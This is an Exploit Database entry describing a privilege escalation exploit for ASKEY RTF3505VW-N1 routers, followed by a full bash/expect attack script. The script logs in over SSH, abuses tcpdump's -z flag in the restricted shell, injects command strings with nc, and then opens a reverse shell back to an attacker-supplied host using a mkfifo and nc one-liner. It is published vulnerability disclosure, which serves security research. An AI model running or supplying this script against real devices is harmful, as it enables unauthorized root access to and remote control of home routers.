ASKEY RTF3505VW-N1 – Privilege Escalation

• Exploit Database
• 23 阅读

• 作者： Leonardo Nicolas Servalli
  日期： 2023-03-31
• 类别：

  • remote
  平台：

  • hardware
• 来源：https://www.exploit-db.com/exploits/51155/

• # Exploit Title: ASKEY RTF3505VW-N1 - Privilege escalation
  # Date: 07-12-2022
  # Exploit Author: Leonardo Nicolas Servalli
  # Vendor Homepage: www.askey.com
  # Platform: ASKEY router devices RTF3505VW-N1
  # Tested on: Firmware BR_SV_g000_R3505VMN1001_s32_7
  # Vulnerability analysis: https://github.com/leoservalli/Privilege-escalation-ASKEY/blob/main/README.md
  
  #Description:
  #----------
  
  # Mitrastar ASKEY RTF3505VW-N1 devices are provided with access through ssh into a restricted default shell (credentials are on the back of the router and in some cases this routers use default credentials).
  
  # The command “tcpdump” is present in the restricted shell and do not handle correctly the -z flag, so it can be used to escalate privileges through the creation of a local file in the /tmp directory of the router, and injecting packets through port 80 used for the router's Web GUI) with the string ";/bin/bash" in order to be executed by "-z sh". By using “;/bin/bash” as injected string we can spawn a busybox/ash console.
  
  #Exploit:
  #--------
  #!/usr/bin/bash
  
  if [ -z "$@" ]; then 
  	echo "Command example: $0 routerIP routerUser routerPassword remoteIPshell remotePortShell "
  	exit 0
  fi
  
  for K in $(seq 1 15) 	# Attemps 
  do
  
  echo "**************************************************************************************"
  echo "******************************** Attempt number $K ************************************"
  echo "**************************************************************************************"
  
  for l in $(seq 1 200) ; do echo ";/bin/bash" | nc -p 8888 $1 80 ; done > /dev/null 2>&1 &	# start a background loop injecting the string ";/bin/bash" on the port 80 of the router
  
  # Expect script for interact with the router through SSH, login, launch the tcpdump with the option "-z sh", and finally launch a more stable busybox reverse shell to our listener
  /usr/bin/expect << EOD
  	spawn ssh $2@$1
  	expect 	{
  		"password: " {
  		send "$3\r"
  		expect ">"
  		send -- "tcpdump -v -ln -i any -w /tmp/runme$K -W 1 -G 1 -z sh src port 8888\r"		# filter by source port 8888
  		}
  		"yes/no" {
  		send "yes\r"
  		#exp_continue
  		}
  	}
  	set timeout 2
  	expect 	{
  		timeout {
  	puts "Timeout..."
  	send "exit\r"
  	exit 0
  		}
  
  		"*usy*ox" {
  	expect "#"
  	send "rm /tmp/runme* \r"
  		send "rm -f /tmp/f;mknod /tmp/f p;cat /tmp/f | /bin/sh -i 2>&1|nc $4 $5 >/tmp/f \r"
  	puts "Rooted !!!!!!!!!"
  	set timeout -1
  	expect "NEVER_APPEARING_STRING#"# wait an infinite time to mantain the rverse shell open
  		}
  	}
  EOD
  
  done